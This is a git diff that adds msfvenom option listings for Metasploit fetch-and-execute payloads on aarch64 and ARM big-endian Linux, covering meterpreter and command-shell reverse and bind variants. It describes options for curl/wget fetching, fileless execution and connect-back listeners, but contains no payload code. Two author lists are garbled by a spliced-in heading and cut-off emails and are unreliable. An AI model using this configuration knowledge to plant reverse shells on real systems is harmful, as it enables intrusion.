port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..eb78b54 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME IHvjSdBvJzEf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt new file mode 100644 index 0000000..313717d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt @@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/aarch64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CbrLJLwKRPdb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + dup2 socket in x12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..aa121c0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt @@ -0,0 +1,81 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/aarch64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME shDguViqh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..d8498d8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME StuziyPw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..a0cfbfd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XhqxIbdAADBV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..cf26ebc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aubpeJLQm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt new file mode 100644 index 0000000..450e5ea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt @@ -0,0 +1,72 @@ + + Name: HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/armbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Balazs Bucsay @xoreipeip + 